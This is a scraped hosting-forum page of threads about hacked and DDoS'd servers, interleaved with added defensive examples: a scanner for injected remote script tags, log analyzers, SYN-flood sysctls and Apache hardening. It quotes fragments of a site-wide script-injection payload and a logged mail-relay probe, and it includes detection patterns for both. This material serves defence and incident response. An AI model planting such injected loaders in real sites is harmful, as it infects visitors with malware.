Web Server Has Been Attacked

Jul 1, 2009

Server info:
Windows 2003 box
Dedicated server currently hosted at The Planet.

Problem:

It would appear there has been a security breach on the server recently. This morning we cleared off a Trojan, and also a new user that had been created on the server.

All of the websites we host (around 200) have been affected. Almost every file had new JavaScript or links to an .swf; they load in iframes and are very malicious, actually giving any visitor to the site a virus.

I tracked down the embed code that I found in most files appended to the end of each file.

Below shows up in most .asp, .cfm, .html files (no spaces, just can't paste a url in here yet)...

<scRipT s rc=[url]
<scRipT sr c=[url]
Below shows up in any .js file (no spaces, just can't paste a url in here yet)...

document.writeln ("<script sr c=[url]
document.writeln ("<script sr c=[url]

So I got a script that opens up every file looking for this code and stripping it out.

It seemed to work at first, but now all the sites have been rewritten again... and again.

So obviously something is overwriting this.

View 7 Replies
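The cleanup script described in the post has two weaknesses that bite in exactly this situation: the injected tag varies its case (scRipT) to dodge a plain grep, and a blind strip of every `<script src=...>` also removes the sites' own scripts. The following is an added example, not the poster's script, of a scanner and cleaner that flags only remote script loaders whose host is not on an allowlist, in both the markup form (.asp/.cfm/.html) and the document.writeln form (.js) the post describes. The allowlisted host `www.mysite.example`, the `bad.example` URL in the sample inputs, and the function names are assumptions for the example.

```python
"""Find and strip remote <script src=...> loaders injected into web files.

Added example; not from the original post. Assumes the sites' own scripts are
either relative paths or hosted on a known list of allowlisted hosts, and that
anything else loading a remote script is an injection: the post's pattern is
<scRipT src=...> appended to .asp/.cfm/.html and document.writeln("<script
src=...") appended to .js.
"""
import re
import sys
from pathlib import Path
from urllib.parse import urlsplit

# Variants like <scRipT sRc=http://...> dodge case-sensitive greps, so match
# case-insensitively and accept unquoted, single- or double-quoted src values.
SCRIPT_TAG = re.compile(
    r'<\s*script\b[^>]*?\bsrc\s*=\s*(["\']?)\s*([^"\'\s>]+)\1[^>]*>'
    r'\s*(?:<\s*/\s*script\s*>)?',
    re.IGNORECASE)

# In .js files the same tag is written out with document.writeln("...").
WRITELN = re.compile(r'document\s*\.\s*writeln\s*\((.*?)\)\s*;?',
                     re.IGNORECASE | re.DOTALL)
# src= inside a writeln string literal; its quotes may be backslash-escaped.
SRC_ATTR = re.compile(r'\bsrc\s*=\s*\\?["\']?\s*([^"\'\s>\\]+)', re.IGNORECASE)

MARKUP_SUFFIXES = {'.asp', '.cfm', '.html', '.htm', '.aspx', '.php'}


def host_of(url):
    """Lowercase host of a script URL; '' for relative paths like /js/site.js."""
    if url.startswith('//'):
        url = 'http:' + url
    return (urlsplit(url).hostname or '').lower()


def kind_of(path):
    """'js' for JavaScript files, 'markup' for server pages and HTML."""
    return 'js' if Path(path).suffix.lower() == '.js' else 'markup'


def find_injections(text, kind, allowed_hosts):
    """Return [(url, start, end)] for remote script loaders not on the allowlist.

    Relative src values and allowlisted hosts are the site's own scripts and
    are never reported, so a cleanup pass cannot break legitimate pages.
    """
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    if kind == 'js':
        for m in WRITELN.finditer(text):
            body = m.group(1)
            src = SRC_ATTR.search(body) if '<script' in body.lower() else None
            if src and host_of(src.group(1)) and host_of(src.group(1)) not in allowed:
                hits.append((src.group(1), m.start(), m.end()))
    else:
        for m in SCRIPT_TAG.finditer(text):
            url = m.group(2)
            if host_of(url) and host_of(url) not in allowed:
                hits.append((url, m.start(), m.end()))
    return hits


def strip_injections(text, kind, allowed_hosts):
    """Remove flagged loaders; return (cleaned_text, [urls]) for blocklisting."""
    hits = find_injections(text, kind, allowed_hosts)
    for _url, start, end in reversed(hits):   # right to left keeps offsets valid
        text = text[:start] + text[end:]
    return text, [url for url, _s, _e in hits]


def scan_tree(root, allowed_hosts):
    """Walk a web root; return {path: [injected urls]} for infected files only."""
    infected = {}
    for path in Path(root).rglob('*'):
        if not path.is_file() or path.suffix.lower() not in MARKUP_SUFFIXES | {'.js'}:
            continue
        text = path.read_text(encoding='utf-8', errors='replace')
        hits = find_injections(text, kind_of(path), allowed_hosts)
        if hits:
            infected[str(path)] = [url for url, _s, _e in hits]
    return infected


if __name__ == '__main__':
    # Usage: python scan.py <webroot> <allowed-host> [<allowed-host> ...]
    for path, urls in scan_tree(sys.argv[1], sys.argv[2:]).items():
        print(path, *sorted(set(urls)))
```

Run it against a copy of the web root first and review the URL list it prints: those hosts are what to block at the server's outbound firewall and to search for in every other file type, and the same list is the indicator to hand to the hosting provider. Cleaning the files alone does nothing about the mechanism that rewrote them, which is why the sites were re-infected; the process or account doing the writing (the removed Trojan, the created user, or whatever credentials it stole, such as FTP logins) has to be found and removed before a clean pass will hold.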


Server Is Being Attacked

Jun 20, 2007

222.216.28.147 - - [20/Jun/2007:06:05:04 -0500] "GET [url]
(compatible; MSIE 6.0; Windows NT 5.0)"
172.131.255.237 - - [20/Jun/2007:04:41:06 -0500] "POST [url]
172.131.255.237 - - [20/Jun/2007:04:41:07 -0500] "CONNECT mx1.mail.yahoo.com:25 HTTP/1.0" 405 303 "-" "-"

View 1 Replies View Related

Is My Server Being Attacked

Dec 25, 2008

Is my server being attacked? Please help.

I'm using Linux RedHat EL5. Recently, my server has gone down at almost the same time every day.
I tried looking in /var/log/messages; it is flooded by this kind of message:


Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=430 from=173.66.124.249
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=437 from=92.84.45.130
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=439 from=173.66.124.249
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=440 from=173.66.124.249
Dec 25 22:41:24 ls1 kernel: ip_conntrack: table full, dropping packet.

In the log, the "from=xx.xx.xxx.xxx" addresses are not all the same, but the same IP appears for a while, then changes to another.

I'm a newbie to Linux and do not quite understand what this message means. Can this be the cause of my server going down? Please suggest.

View 7 Replies View Related
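The two lines in the excerpt above belong together: xinetd logs a new SMTP session for every incoming connection, and "ip_conntrack: table full, dropping packet" means the kernel's connection-tracking table filled up and new packets (legitimate web and SSH traffic included) are being dropped, which is exactly what a server that "goes down" at the same time every day looks like. As an added example, not from the thread, here is a small script that reads the RHEL5-style syslog lines from the post, counts new sessions per source and per second, and reports the conntrack drops alongside them; the threshold in `offenders` and the function names are assumptions for the example.

```python
"""Summarise xinetd connection bursts and ip_conntrack drops from /var/log/messages.

Added example, not from the thread. Assumes the RHEL5 syslog format shown in
the post: "Mon DD HH:MM:SS host xinetd[pid]: START: svc pid=N from=IP" and
"... kernel: ip_conntrack: table full, dropping packet."
"""
import re
import sys
from collections import Counter

SYSLOG_TS = r'(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d)'
XINETD_START = re.compile(
    SYSLOG_TS + r' \S+ xinetd\[\d+\]: START: (?P<svc>\S+) pid=\d+ from=(?P<ip>\S+)')
CONNTRACK_FULL = re.compile(SYSLOG_TS + r' \S+ kernel: ip_conntrack: table full')

# Lines taken from the log excerpt in the post.
SAMPLE_LOG = """\
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=430 from=173.66.124.249
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=437 from=92.84.45.130
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=439 from=173.66.124.249
Dec 25 22:41:16 ls1 xinetd[3958]: START: smtp pid=440 from=173.66.124.249
Dec 25 22:41:24 ls1 kernel: ip_conntrack: table full, dropping packet.
""".splitlines()


def summarize(lines, service='smtp'):
    """Count new sessions per source IP and per second, and conntrack drops."""
    per_ip, per_second, drops = Counter(), Counter(), []
    for line in lines:
        m = XINETD_START.match(line)
        if m:
            if m.group('svc') == service:
                per_ip[m.group('ip')] += 1
                per_second[m.group('ts')] += 1
            continue
        m = CONNTRACK_FULL.match(line)
        if m:
            drops.append(m.group('ts'))
    return {
        'per_ip': per_ip,
        'peak_per_second': max(per_second.values(), default=0),
        'conntrack_drops': len(drops),
        'drop_times': drops,
    }


def offenders(summary, min_sessions):
    """Source IPs that opened at least min_sessions sessions, busiest first."""
    return [ip for ip, n in summary['per_ip'].most_common() if n >= min_sessions]


if __name__ == '__main__':
    # Usage: python smtp_bursts.py [/var/log/messages]
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG
    s = summarize(lines)
    print(f"peak new smtp sessions/second: {s['peak_per_second']}")
    print(f"conntrack table-full drops:    {s['conntrack_drops']}")
    for ip in offenders(s, 2):
        print(f"{s['per_ip'][ip]:6d}  {ip}")
```

Two things to check on the box itself: compare `/proc/sys/net/ipv4/netfilter/ip_conntrack_count` with `ip_conntrack_max` while the flood is on (the RHEL5 names for these sysctls), and raise the maximum if the table is simply too small for a mail server. Separately, xinetd's `per_source` and `cps` attributes cap how many connections one address may hold and how many new connections per second a service accepts, which stops a single source from filling the table in the first place.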

Server Being Attacked Via Http

Jun 1, 2007

My friend's server is being attacked: the number of httpd processes shoots up, causing the server load to go above 200 within minutes of starting httpd, which causes the server to die.

This is how the Apache web server's access_log logs a normal HTTP request:
------------------------------------------------------
"xx.xxx.xx.xx - - [01/Jun/2007:22:13:21] "GET /folder/name.gif HTTP/1.1" 200 877 [url]"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
------------------------------------------------------

Today, when the HTTP load increased, we saw hundreds of the following requests:
------------------------------------------------------
"xx.xxx.xx.xx - - [01/Jun/2007:22:13:21] "GET /? HTTP/1.1" 200 16305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
------------------------------------------------------

You see, the difference between a legitimate HTTP access log entry and the above one is that the legitimate one shows the filename (GET /folder/name.gif) and the domain name being requested, whereas the second one shows "GET /?".

The above requests continuously originate from 30 to 40 different IP addresses. Most of them are Russian IPs, and many are from the US and Canada too.

When I do a grep for "GET /?" in the access log there are thousands of these, which started just today.

I cannot block each IP because I feel they have hundreds of IPs to initiate these requests from.

View 14 Replies View Related
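The two access-log excerpts on this page show the two classic things a web server's log reveals under attack: the CONNECT to port 25 in the 2007 post above is someone testing whether the server will relay mail as an open proxy (the 405 says it refused), and the "GET /?" burst in this post is a flood of cheap requests for the uncached front page from a few dozen sources sharing one User-Agent string. As an added example, not from either thread, here is detection logic run over a handful of lines in Apache's combined log format: the CONNECT line is copied from the 2007 post, the 198.51.100.x addresses, the threshold, and the function names are constructed for the example.

```python
"""Flag open-proxy probes and single-path floods in Apache access logs.

Added example, not from either thread. Assumes the combined log format shown
in the posts; the flood signature is the repeated "GET /?" request with no
Referer from many sources.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?')

# Constructed sample: one normal hit, the CONNECT probe quoted in the 2007
# post, and a burst of "GET /?" from three documentation-range addresses.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2007:22:13:21 -0500] "GET /folder/name.gif HTTP/1.1" 200 877 '
    '"http://www.example.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    '172.131.255.237 - - [20/Jun/2007:04:41:07 -0500] '
    '"CONNECT mx1.mail.yahoo.com:25 HTTP/1.0" 405 303 "-" "-"',
] + [
    f'198.51.100.{i % 3 + 1} - - [01/Jun/2007:22:13:2{i % 10} -0500] "GET /? HTTP/1.1" 200 16305 '
    '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"'
    for i in range(12)
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    return entry


def is_proxy_probe(entry):
    """CONNECT, or a request target that is an absolute URL, is a client asking
    this server to relay for it; CONNECT to port 25 is a spam-relay probe."""
    return entry['method'] == 'CONNECT' or \
        entry['target'].lower().startswith(('http://', 'https://'))


def analyze(lines, flood_path='/?', flood_threshold=20):
    """Return proxy probes, per-IP hit counts for flood_path at or above the
    threshold, and the User-Agent strings the flood traffic used."""
    probes, per_ip, agents = [], Counter(), Counter()
    for entry in filter(None, map(parse_line, lines)):
        if is_proxy_probe(entry):
            probes.append((entry['ip'], entry['method'], entry['target'], entry['status']))
        if entry['target'] == flood_path:
            per_ip[entry['ip']] += 1
            agents[entry['agent'] or '-'] += 1
    return {
        'proxy_probes': probes,
        'flood_ips': {ip: n for ip, n in per_ip.items() if n >= flood_threshold},
        'flood_agents': agents,
    }


def deny_list(report):
    """Sorted, de-duplicated addresses to feed an iptables or APF deny rule."""
    ips = {ip for ip, *_ in report['proxy_probes']} | set(report['flood_ips'])
    return sorted(ips)


if __name__ == '__main__':
    import sys
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG
    report = analyze(lines, flood_threshold=3)
    print('proxy probes:', report['proxy_probes'])
    print('flood sources:', report['flood_ips'])
    print('flood user-agents:', report['flood_agents'].most_common(3))
    print('deny:', deny_list(report))
```

For the proxy probe the thing to verify is the status: a 405 or 403 means Apache refused, a 200 on a CONNECT or absolute-URL request means the box is relaying for strangers and `ProxyRequests` must be turned off. For the flood, 30 to 40 sources is a number a host can actually deny at the packet filter, and `deny_list` produces exactly that list from the log; the identical User-Agent with an empty Referer across all of them is the fingerprint to keep matching on when the addresses rotate.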

Server Is Being DDOS Attacked

Oct 22, 2007

I see what IPs are attacking them? OS: CentOS

View 9 Replies View Related

My Limestone Server - Virus Attacked Or What?

Jul 23, 2009

Alright guys - my server the past two weeks is just freaking ridiculous. It's a Core2Quad Q9300 2.5GHz server with 8GB of RAM. It should be fast as hell. I can't move 20 e-mails in my mail client without the server grinding to a complete halt and httpd and MySQL going unresponsive. Right now I'm just trying to copy a damned screenshot of the Task Manager performance tab and it's taking about 3 minutes to paste it, even though the CPU utilization is averaging only 20% at the moment and memory is only 2.5GB.


I restarted WAMP and now it seems to be running smoother. My Outpost firewall, though, didn't show so many connections to the server that it should have been maxing out.

Here are my ping responses just now while I was typing this - I was watching the firewall connections and I was only having like 60 connections to httpd, 20 connections to MySQL, 5-10 to my SmarterTools mail server, and then my remote desktop connection. My network utilization got up to a whole 5%, so it's not that I have too many connections or something. Here are the ping responses:

C:\Documents and Settings\Brian>ping mifbody.com -n 99

Pinging mifbody.com [216.245.195.146] with 32 bytes of data:

Reply from 216.245.195.146: bytes=32 time=70ms TTL=115
Reply from 216.245.195.146: bytes=32 time=73ms TTL=115
Reply from 216.245.195.146: bytes=32 time=81ms TTL=115
Reply from 216.245.195.146: bytes=32 time=78ms TTL=115
Reply from 216.245.195.146: bytes=32 time=71ms TTL=115 ....

View 7 Replies View Related

Being Attacked What Can I Do

May 28, 2008

From running smoothly to suddenly going to 900 write requests, my web server crashes.

I don't want to be asking the DC to restart my machine every minute.

They installed Squid, which solved the load and seems to run smoothly. But my script doesn't function properly as everything is cached.

I then put all my images/css etc on a lighttpd server which can handle all the requests without problems.

So now Apache is only handling around 30 PHP requests per second. But it will magically jump up to 600+.

The DC says I'm being syn flooded.

I have APF, deflate DDoS, etc. installed.

Anything else I can do?

View 6 Replies View Related

Being Attacked - DDOS?

Nov 6, 2007

OK, well, today I found out my server was being DDoSed.

And I know which domain is being attacked with hundreds of IPs. I am running cPanel/WHM, but I have no idea how I can stop this?

Any ideas or suggestions? Maybe redirect the DNS to an invalid IP? But I'm not sure how I can go about doing that.

View 9 Replies View Related

If 1 Website Were To Get Attacked

Jun 29, 2009

If one website on my server were to get a DDoS attack, would it knock out my server for a while, and can I recover the server by restarting it?

View 14 Replies View Related

Getting DDos Attacked

May 28, 2008

All my websites are down because of a DoS attack on port 80. Rackspace basically said they can't do anything to help me unless I want them to install a $1500 a month hardware add-on. They tried banning a couple of IP addresses and that did not work. They recommended prolexic.com, but does anyone have any other advice?

View 14 Replies View Related

Attacked By Russia

Jun 11, 2008

I have been consistently attacked by Russia.

When I had Apache, my server would die and you couldn't even SSH in. Now I have LiteSpeed, my site loads, but SUPER SUPER slowly.

Last night I was SYN flooded with 125 Mbps. They consumed nearly all my bandwidth, and I owe the DC tons of cash in bandwidth now. I managed to block Russia and the load halved to about 50, and the site was still functional but intermittent.

I have been running Deflate DDoS etc to block IPs.

I'm wondering if I get a load balancer with another box, would this fix my problems?

I heard you can modify the settings somewhere to identify syn attacks and auto block them.

View 3 Replies View Related
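The "settings somewhere to identify SYN attacks" that this post and the one above it are asking about are Linux kernel sysctls. The fragment below is an added example, not from either thread; the values are common starting points for a 2.6-era Linux web server and are assumptions, not figures tuned for either poster's machine.

```ini
# /etc/sysctl.conf additions; apply with "sysctl -p", persists across reboots.
# Added example, not from the thread. Values are starting points, not tuned numbers.

# Answer SYNs with a SYN cookie once the listen backlog is full, so half-open
# connections from spoofed sources stop holding queue slots.
net.ipv4.tcp_syncookies = 1

# Half-open connections a listening socket may queue before cookies kick in
# (the default on 2.6 kernels is small).
net.ipv4.tcp_max_syn_backlog = 4096

# Retransmit the SYN-ACK fewer times (default 5), so a spoofed SYN is
# forgotten in seconds rather than minutes.
net.ipv4.tcp_synack_retries = 2

# Drop packets whose source address is not routable back out the interface
# they arrived on; removes part of the spoofed traffic.
net.ipv4.conf.all.rp_filter = 1

# Log packets with impossible source addresses so the flood is visible in
# dmesg and /var/log/messages.
net.ipv4.conf.all.log_martians = 1
```

These settings only help with packets that actually reach the host. A 125 Mbps SYN flood on a 100 Mbps port is lost upstream of the server, the bandwidth is billed whether or not the kernel drops the packets, and a second box behind a load balancer shares the same saturated link; the fix at that volume is filtering or null-routing at the data centre's edge, which is what the DC has to do for you. Tools like DDoS Deflate count established connections per address from netstat, so they never see spoofed SYNs at all; SYN cookies do, which is why the kernel setting is the right layer for this particular attack.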

Site Getting Attacked At Will

Oct 11, 2007

My site has been getting attacked for the last couple of days, and the attacker brings it down in 5-10 minutes. I have to restart the Apache web server to bring it back again, until he strikes again.

I am trying to secure it as much as possible using .htaccess. I am able to stop almost all the perl/php scripts etc., but the last time the hacker attacked the site today, I saw hundreds of these entries in my logs:

Code:
71.181.220.147 - - [10/Oct/2007:21:44:44 -0700] "GET /templates/template/images/content.png HTTP/1.1" 200 510 [url] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Embedded Web Browser from: [url] .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; IEMB3; .NET CLR 2.0.50727; IEMB3)"

I would like to know what this "Embedded Web Browser from: [url]" is, and how can I block the hacker from running this using .htaccess?

View 10 Replies View Related
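A User-Agent string ending in "Embedded Web Browser from: ..." with IEMB tokens is what a program driving an embedded Internet Explorer control sends, rather than a person in a browser; the fact that the logged hits are for an image means the tool is loading full pages, images included, over and over. Blocking on that string in .htaccess is an added example, not the poster's file, written in the Apache 2.2 syntax this 2007 thread implies; the environment-variable name `bad_ua` is arbitrary.

```apache
# .htaccess fragment (Apache 2.2 syntax). Added example, not the poster's file.
# Tag requests whose User-Agent carries the "Embedded Web Browser from:" token
# from the log line above, or the IEMB3 token that appears beside it, then
# refuse them.
<IfModule mod_setenvif.c>
    SetEnvIfNoCase User-Agent "Embedded Web Browser from:" bad_ua
    SetEnvIfNoCase User-Agent "IEMB3" bad_ua
</IfModule>

# mod_authz_host (2.2): allow everyone, then deny whoever was tagged above.
# The .htaccess needs AllowOverride Limit for these three lines to be honoured.
Order Allow,Deny
Allow from all
Deny from env=bad_ua
```

With mod_rewrite instead, `RewriteCond %{HTTP_USER_AGENT} "Embedded Web Browser from:" [NC]` followed by `RewriteRule ^ - [F]` does the same; on Apache 2.4 the deny becomes `Require not env bad_ua` inside a `<RequireAll>`. Two caveats: the User-Agent is chosen by the client, so this stops this one tool and not the attacker once he changes the string, and every refused request still costs Apache a worker to produce the 403. At the rate described, the limit that actually keeps the server up belongs in front of Apache (iptables connection limits or mod_evasive on request rate per address), with the User-Agent match as a cheap second layer.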

I'm Being DOS Attacked By A Gameserver Company!

Dec 20, 2008

My internet connection started cutting out, and I found it strange. I presumed it was a problem with my ISP, and so I ignored it as they're pretty crap. Then it carried on today, so I did some investigation (turned on error logging for my router). So I go ahead and wait; an hour later my internet connection cuts out. To the logs!

Sat, 2008-12-20 22:01:38 - UDP Packet - Source:89.238.152.200,28960 Destination:192.168.1.103,28960 - [Firewall Log-DOS] ....

Am I correct in thinking there are multiple IP addresses "Attacking" my home network? If so, that's mighty strange and should I be worried?

I checked some of the IPs; most go to dedicated servers around the world. One is a gameserver admin panel. Have these been hijacked and are being used to "attack" me?

I have a theory, though it's probably wrong: the port number 28960 is used by Call of Duty 1 as the "default" port for a game server, and I play a lot of CoD1. Therefore, presumably, that port is open on our router, so somehow they've found it to be open and are "attacking" it. I'm not sure, but it seems possible; not sure why though.

192.168.1.103 is presumably ME on our subnet? The router is a Linksys.

View 10 Replies View Related

Identify What Domain Is Being Attacked

Mar 20, 2008

Is there a way to determine from monitoring the packets coming in to my IP address what domain on my server is being attacked? Something like Tcpdump maybe can tell me? Having DDoS trouble and I'm trying to identify the domain being hit.

View 2 Replies View Related

Site Being Attacked Hard

Jul 27, 2008

I'm Tech admin at Fagex.net

This site has always been prone to attacks on its servers. At the moment there's been a new owner, and so things have not settled back down yet; however, people are still attacking the site.

As far as I am aware the hosting has no software/hardware firewall. I have told the owner, but he has not taken my advice.

This morning I woke up to find it was being attacked, so I went straight to SSH and started blocking them etc.

I was looking around for free anti-DoS tools and came across:

[url]

It seems good; I've only just installed it, so I still need to see the effects.

I also added a block into .htaccess which has:

Quote:

<IfModule mod_limitipconn.c>
<Location />
MaxConnPerIP 3
NoIPLimit image/*
</Location>
</IfModule>

The server is a dedicated VPS, and the owner has two sites on it, both of which are forums.

What can i do to protect the sites? What can i do to prevent them? What can i do to stop them.

View 12 Replies View Related

Port Scan Attacked On Users

Apr 14, 2007

[url]

[url]

One of my users posted this in the forum saying my server is scanning his computer. Is this serious? Do I have a virus? Should I be worried? Well, I am kinda worried. I tried googling it, but I can't seem to figure out the right keywords for a good result.

View 4 Replies View Related

Hacked - DDos Attacked, Downtime 1 Week...

Aug 23, 2008

The attack is large enough now that the rules I've put in place aren't really helping much. mod_evasive and mod_security are also installed; however, this doesn't appear to be helping much either. The invalid user-agents hitting the site are filling up the max connections and then Apache stops responding. I also tried raising the MaxClients in httpd.conf; however, the VPS then started hitting its memory limit.

I was on a shared plan and they moved me to a VPS; same problem.
Host: urljet.com

I have had one host representative that said "I think we could take care of you but you would have to use this plan with the firewalls"

www.liquidweb.com/cart/content/dedicated/Webmaster/Plan1

View 14 Replies View Related

Improve Performance- Web Server, SSH Server, And Mail Server

May 8, 2007

I've got a VPS which is serving as the main server for a number of sites. Web Server, SSH Server, and Mail Server.

What I've got running:

Apache2, PHP5, MySQL5, Dovecot, Postfix

One of the sites is a growing forum with a MASSIVE photo album. This is the site where I notice the most slowness.

Changing the server software is not an option - Only optimization.

Quote:

Originally Posted by httpd.conf

ServerTokens OS
ServerRoot "/etc/httpd"
PidFile run/httpd.pid
Timeout 300
KeepAlive Off
MaxKeepAliveRequests 100
KeepAliveTimeout 5
<IfModule prefork.c>
StartServers 8
MinSpareServers 8
MaxSpareServers 13
ServerLimit 256
MaxClients 256
MaxRequestsPerChild 50
</IfModule>
<IfModule worker.c>
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadsPerChild 25
MaxRequestsPerChild 0
</IfModule>
Listen 80
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule auth_digest_module modules/mod_auth_digest.so
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authn_alias_module modules/mod_authn_alias.so
LoadModule authn_anon_module modules/mod_authn_anon.so
LoadModule authn_dbm_module modules/mod_authn_dbm.so
LoadModule authn_default_module modules/mod_authn_default.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule authz_owner_module modules/mod_authz_owner.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_dbm_module modules/mod_authz_dbm.so
LoadModule authz_default_module modules/mod_authz_default.so
LoadModule ldap_module modules/mod_ldap.so
LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
LoadModule include_module modules/mod_include.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule logio_module modules/mod_logio.so
LoadModule env_module modules/mod_env.so
LoadModule ext_filter_module modules/mod_ext_filter.so
LoadModule mime_magic_module modules/mod_mime_magic.so
LoadModule expires_module modules/mod_expires.so
LoadModule deflate_module modules/mod_deflate.so
LoadModule headers_module modules/mod_headers.so
LoadModule usertrack_module modules/mod_usertrack.so
LoadModule setenvif_module modules/mod_setenvif.so
LoadModule mime_module modules/mod_mime.so
LoadModule dav_module modules/mod_dav.so
LoadModule status_module modules/mod_status.so
LoadModule autoindex_module modules/mod_autoindex.so
LoadModule info_module modules/mod_info.so
LoadModule dav_fs_module modules/mod_dav_fs.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so
LoadModule negotiation_module modules/mod_negotiation.so
LoadModule dir_module modules/mod_dir.so
LoadModule actions_module modules/mod_actions.so
LoadModule speling_module modules/mod_speling.so
LoadModule userdir_module modules/mod_userdir.so
LoadModule alias_module modules/mod_alias.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule proxy_connect_module modules/mod_proxy_connect.so
LoadModule cache_module modules/mod_cache.so
LoadModule suexec_module modules/mod_suexec.so
LoadModule disk_cache_module modules/mod_disk_cache.so
LoadModule file_cache_module modules/mod_file_cache.so
LoadModule mem_cache_module modules/mod_mem_cache.so
LoadModule cgi_module modules/mod_cgi.so
Include conf.d/*.conf
User apache
Group apache

Quote:

Originally Posted by my.cnf

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
# Default to using old password format for compatibility with mysql 3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1

[mysql.server]
user=mysql
basedir=/var/lib

[mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

View 8 Replies View Related
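Two values in the posted httpd.conf explain most of the slowness on an image-heavy forum: `KeepAlive Off` means every thumbnail on an album page opens its own TCP connection and occupies a fresh prefork child, and `MaxRequestsPerChild 50` retires each child after fifty requests, so under load Apache spends its time forking. The excerpt below is an added example, not the poster's file: the same global and prefork directives with those values changed, plus the modules from the posted LoadModule list that a forum-plus-photo-album VPS has no stated use for marked for removal. The memory relationship for MaxClients is an assumption; measure the per-child RSS on the actual box before trusting the number.

```apache
# httpd.conf excerpt. Added example, not the poster's file. Same directives as
# the posted config, with the values that cost the most on a photo-heavy forum
# changed. Per-child memory is an assumption; measure RSS before trusting MaxClients.

# Was "OS": advertises the operating system in the Server header for no benefit.
ServerTokens Prod
ServerSignature Off

# Was 300: a stalled client could hold a prefork child for five minutes.
Timeout 60

# Was Off: each image on an album page opened a new connection and took a
# fresh child; a short keepalive lets one child serve a page's images in turn.
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 3

<IfModule prefork.c>
    StartServers          8
    MinSpareServers       8
    MaxSpareServers      20
    ServerLimit         256
    # 256 children times the measured RSS per child must fit in the VPS's RAM;
    # lower this rather than let the box swap.
    MaxClients          256
    # Was 50: a child lived for only fifty requests, so under load the server
    # was forking and re-initialising PHP almost continuously.
    MaxRequestsPerChild 4000
</IfModule>

# From the posted LoadModule list: nothing in the description (forum, photo
# album; mail handled by Postfix and Dovecot) uses these. Each one is extra
# memory in every child and extra attack surface; keep them out unless a site
# actually needs them.
#LoadModule info_module modules/mod_info.so
#LoadModule dav_module modules/mod_dav.so
#LoadModule dav_fs_module modules/mod_dav_fs.so
#LoadModule proxy_connect_module modules/mod_proxy_connect.so
#LoadModule proxy_ftp_module modules/mod_proxy_ftp.so

# mod_proxy stays loaded in the posted config; make sure it never acts as a
# forward proxy for outsiders. The CONNECT probe in the 2007 log elsewhere on
# this page is what an attacker testing for that looks like.
ProxyRequests Off
```

The posted my.cnf is worth a look for the same reasons. `old_passwords=1` keeps the pre-4.1, 16-byte password hash format, which is much weaker than the 41-byte scheme MySQL 5 uses by default; once no pre-4.1 clients remain, set it to 0 and re-set each account's password so the new hashes are stored. The file also sets no buffer sizes at all, so a growing forum database runs on MySQL 5's compiled-in defaults (`key_buffer_size`, `query_cache_size`, `table_cache`, `thread_cache_size`), which are far too small for a busy site and are the first things to size from the server's actual memory and table footprint.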

Remote Upload To Server (url/server To Server)

Mar 7, 2009

I have looked a lot and cannot find a solution.

I want to transfer a file from [url] to [url] or [url] without it passing through my local computer (slow upload).

It could also be a script I will install, like this one (this one is only for images):
[url](remote)

View 7 Replies View Related

Plesk 11.x / Windows :: Don't Have Root Access To Server As It Is A Webfusion Dedicated Server

Oct 16, 2013

I have Plesk 11.5 (service provider mode) on a Windows 2008 server with IIS7. Most of my sites are developed in .asp, and therefore I use a custom 500-100.asp error page that checks the IP of the visitor and then displays either a friendly error or, if it's my IP, a full error of what has happened (it also emails me the error). This allows me to debug pages easily whilst developing and to keep an eye on anyone trying SQL injection hacks on my sites (as the error and email also have session variables and the IP address). I don't have root access to the server as it is a Webfusion dedicated server. I have followed the Plesk documentation:

1) Switch on custom errors for the subscription
2) Look in virtual directories and navigate to error documents
3) Find the error in question (500:100) and change it to point at either a file or URL

FILE - I had the data centre add the 500-100.asp error page into the virtual template so that my page is available in the list of virtual files. This didn't work, but that may be because it's not a static page??

